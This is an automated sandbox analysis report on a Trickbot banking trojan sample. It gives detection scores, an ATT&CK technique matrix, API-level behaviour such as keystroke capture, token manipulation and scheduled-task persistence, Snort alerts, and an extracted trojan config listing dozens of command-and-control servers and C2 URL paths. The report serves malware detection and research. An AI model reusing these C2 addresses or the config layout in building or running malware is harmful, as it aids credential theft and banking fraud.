Play interactive tour

Edit tour

Analysis Report 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Overview

General Information

Joe Sandbox Version:	26.0.0
Analysis ID:	982876
Start date:	23.10.2019
Start time:	11:33:05
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 10m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript) GSI enabled (Java) AMSI enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.bank.troj.evad.winEXE@4/5@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 67% Number of executed functions: 75 Number of non-executed functions: 352
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, mscorsvw.exe Excluded IPs from analysis (whitelisted): 93.184.221.240, 8.241.121.126, 67.26.81.254, 8.241.9.254, 8.248.119.254, 8.241.9.126, 8.248.129.254, 67.26.75.254, 205.185.216.42, 205.185.216.10 Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, wu.azureedge.net Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Threat	Detection
Threshold	68	0 - 100	Report FP / FN	false	Trickbot

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Contains functionality to modify the execution of threads in other processes

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts1	Scheduled Task1	Valid Accounts1	Valid Accounts1	Valid Accounts1	Input Capture11	System Time Discovery2	Application Deployment Software	Input Capture11	Data Encrypted12	Uncommonly Used Port1
Replication Through Removable Media	Execution through API1	Scheduled Task1	Access Token Manipulation11	Access Token Manipulation11	Network Sniffing	Query Registry1	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Standard Cryptographic Protocol22
Drive-by Compromise	Windows Management Instrumentation	Accessibility Features	Scheduled Task1	Deobfuscate/Decode Files or Information1	Input Capture	Process Discovery1	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Non-Application Layer Protocol2
Exploit Public-Facing Application	Scheduled Task	System Firmware	DLL Search Order Hijacking	Obfuscated Files or Information2	Credentials in Files	Application Window Discovery1	Logon Scripts	Input Capture	Data Encrypted	Standard Application Layer Protocol2
Spearphishing Link	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	Masquerading	Account Manipulation	Account Discovery1	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol
Spearphishing Attachment	Graphical User Interface	Modify Existing Service	New Service	DLL Search Order Hijacking	Brute Force	System Owner/User Discovery1	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port
Spearphishing via Service	Scripting	Path Interception	Scheduled Task	Software Packing	Two-Factor Authentication Interception	Security Software Discovery3	Pass the Hash	Email Collection	Exfiltration Over Command and Control Channel	Uncommonly Used Port
Supply Chain Compromise	Third-party Software	Logon Scripts	Process Injection	Indicator Blocking	Bash History	Remote System Discovery1	Remote Desktop Protocol	Clipboard Data	Exfiltration Over Alternative Protocol	Standard Application Layer Protocol
Trusted Relationship	Rundll32	DLL Search Order Hijacking	Service Registry Permissions Weakness	Process Injection	Input Prompt	System Network Configuration Discovery11	Windows Admin Shares	Automated Collection	Exfiltration Over Physical Medium	Multilayer Encryption
Hardware Additions	PowerShell	Change Default File Association	Exploitation for Privilege Escalation	Scripting	Keychain	File and Directory Discovery2	Taint Shared Content	Audio Capture		Connection Proxy
	Execution through API	File System Permissions Weakness	Valid Accounts	Indicator Removal from Tools	Private Keys	System Information Discovery14	Replication Through Removable Media	Video Capture		Communication Through Removable Media

Signature Overview

Click to jump to signature section

AV Detection:

Yara detected Trickbot

Show sources

Source: Yara match	File source: 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ______.exe PID: 3448, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\ProgramData\??????.exe	Code function: 2_2_005CF800 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	2_2_005CF800
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D08A0 CryptStringToBinaryW,CryptStringToBinaryW,	2_2_005D08A0
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D7190 CryptBinaryToStringW,CryptBinaryToStringW,	2_2_005D7190
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D5AB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,	2_2_005D5AB0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006EF800 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	3_2_006EF800
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F5AB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,	3_2_006F5AB0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F08A0 CryptStringToBinaryW,CryptStringToBinaryW,	3_2_006F08A0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F7190 CryptBinaryToStringW,CryptBinaryToStringW,	3_2_006F7190

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Show sources

Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_CLASSES\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_CLASSES\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\ProgramData\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_0041E050 FindFirstFileA,FindClose,	0_2_0041E050
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_0041D790 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	0_2_0041D790
Source: C:\ProgramData\??????.exe	Code function: 2_2_005CD4B0 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,FindClose,	2_2_005CD4B0
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D5710 FindFirstFileW,lstrcmpiW,FindNextFileW,FindNextFileW,Sleep,lstrcmpiW,FindNextFileW,FindNextFileW,FindNextFileW,lstrcmpiW,FindClose,	2_2_005D5710
Source: C:\ProgramData\??????.exe	Code function: 2_2_005CC7C0 Sleep,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindClose,	2_2_005CC7C0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006ED4B0 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,FindClose,	3_2_006ED4B0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F5710 FindFirstFileW,lstrcmpiW,FindNextFileW,FindNextFileW,Sleep,lstrcmpiW,FindNextFileW,FindNextFileW,FindNextFileW,lstrcmpiW,FindClose,	3_2_006F5710
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006EC7C0 Sleep,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindClose,	3_2_006EC7C0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2404342 ET CNC Feodo Tracker Reported CnC Server TCP group 22 192.168.1.16:49163 -> 81.190.160.139:449

May check the online IP address of the machine

Show sources

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49163 -> 81.190.160.139:449

Connects to IPs without corresponding DNS lookups

Show sources

Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139
Source: unknown	TCP traffic detected without corresponding DNS query: 81.190.160.139

Found strings which match to known social media urls

Show sources

Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Urls found in memory or binary data

Show sources

Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, ??????.exe, 00000003.00000002.543221959.01F62000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: ??????.exe, 00000003.00000002.543221959.01F62000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabXy
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: ??????.exe, 00000003.00000002.543221959.01F62000.00000004.00000001.sdmp	String found in binary or memory: https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/14/path/C:%5CUsers%
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, ??????.exe, 00000003.00000002.543221959.01F62000.00000004.00000001.sdmp	String found in binary or memory: https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/23/1000477/
Source: ??????.exe, 00000003.00000002.541399359.002F3000.00000004.00000020.sdmp	String found in binary or memory: https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/5/spk/
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: https://api.ipify.org/?format=text
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Code function: 0_2_0042BF21 GetAsyncKeyState,SendMessageA,

0_2_0042BF21

E-Banking Fraud:

Detected Trickbot e-Banking trojan config

Show sources

Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp

String found in binary or memory: <mcconf> <ver>1000479</ver> <gtag>tt0002</gtag> <servs> <srv>144.91.79.9:443</srv> <srv>172.245.97.148:443</srv> <srv>85.204.116.139:443</srv> <srv>185.62.188.117:443</srv> <srv>185.222.202.76:443</srv> <srv>144.91.79.12:443</srv> <srv>185.68.93.43:443</srv> <srv>195.123.238.191:443</srv> <srv>146.185.219.29:443</srv> <srv>195.133.196.151:443</srv> <srv>91.235.129.60:443</srv> <srv>23.227.206.170:443</srv> <srv>185.222.202.192:443</srv> <srv>190.154.203.218:449</srv> <srv>178.183.150.169:449</srv> <srv>200.116.199.10:449</srv> <srv>187.58.56.26:449</srv> <srv>177.103.240.149:449</srv> <srv>81.190.160.139:449</srv> <srv>200.21.51.38:449</srv> <srv>181.49.61.237:449</srv> <srv>46.174.235.36:449</srv> <srv>36.89.85.103:449</srv> <srv>170.233.120.53:449</srv> <srv>89.228.243.148:449</srv> <srv>31.214.138.207:449</srv> <srv>186.42.98.254:449</srv> <srv>195.93.223.100:449</srv> <srv>181.112.52.26:449</srv> <srv>190.13.160.19:449</srv> <srv>186.71.150.23:449</srv> <srv>190.152.4.98:449</srv> <srv>170.82.156.53:449</s

Yara detected Trickbot

Show sources

Source: Yara match	File source: 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ______.exe PID: 3448, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Show sources

Source: C:\ProgramData\??????.exe	Code function: 2_2_005D5AB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,		2_2_005D5AB0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F5AB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,		3_2_006F5AB0

System Summary:

Contains functionality to call native functions

Show sources

Source: C:\ProgramData\??????.exe	Code function: 2_2_005D1800 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,		2_2_005D1800
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F1800 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,		3_2_006F1800

Contains functionality to launch a process as a different user

Show sources

Source: C:\ProgramData\??????.exe

Code function: 2_2_005C5470 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,OpenProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,CloseHandle,OpenProcessToken,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,GetLastError,CloseHandle,AdjustTokenPrivileges,CloseHandle,

2_2_005C5470

Creates mutexes

Show sources

Source: C:\ProgramData\??????.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\789C000000010
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Mutant created: \BaseNamedObjects\Global\789C000000010

Detected potential crypto function

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_0040C442	0_2_0040C442
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_004196D8	0_2_004196D8
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_004089E4	0_2_004089E4
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_00413B90	0_2_00413B90
Source: C:\ProgramData\??????.exe	Code function: 2_2_005C5470	2_2_005C5470
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D3430	2_2_005D3430
Source: C:\ProgramData\??????.exe	Code function: 2_2_005CA4D0	2_2_005CA4D0
Source: C:\ProgramData\??????.exe	Code function: 2_2_005CF0E0	2_2_005CF0E0
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D0920	2_2_005D0920
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D05C0	2_2_005D05C0
Source: C:\ProgramData\??????.exe	Code function: 2_2_005C4DE0	2_2_005C4DE0
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D35E0	2_2_005D35E0
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D41A0	2_2_005D41A0
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D1A70	2_2_005D1A70
Source: C:\ProgramData\??????.exe	Code function: 2_2_005C2E60	2_2_005C2E60
Source: C:\ProgramData\??????.exe	Code function: 2_2_005C8230	2_2_005C8230
Source: C:\ProgramData\??????.exe	Code function: 2_2_005C3EC0	2_2_005C3EC0
Source: C:\ProgramData\??????.exe	Code function: 2_2_005C36E0	2_2_005C36E0
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D5EB0	2_2_005D5EB0
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D5710	2_2_005D5710
Source: C:\ProgramData\??????.exe	Code function: 2_2_005CC7C0	2_2_005CC7C0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006EA4D0	3_2_006EA4D0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F5710	3_2_006F5710
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006EC7C0	3_2_006EC7C0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006E5470	3_2_006E5470
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F3430	3_2_006F3430
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006EF0E0	3_2_006EF0E0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F0920	3_2_006F0920
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006E4DE0	3_2_006E4DE0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F35E0	3_2_006F35E0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F05C0	3_2_006F05C0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F41A0	3_2_006F41A0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006E2E60	3_2_006E2E60
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F1A70	3_2_006F1A70
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006E8230	3_2_006E8230
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006E36E0	3_2_006E36E0
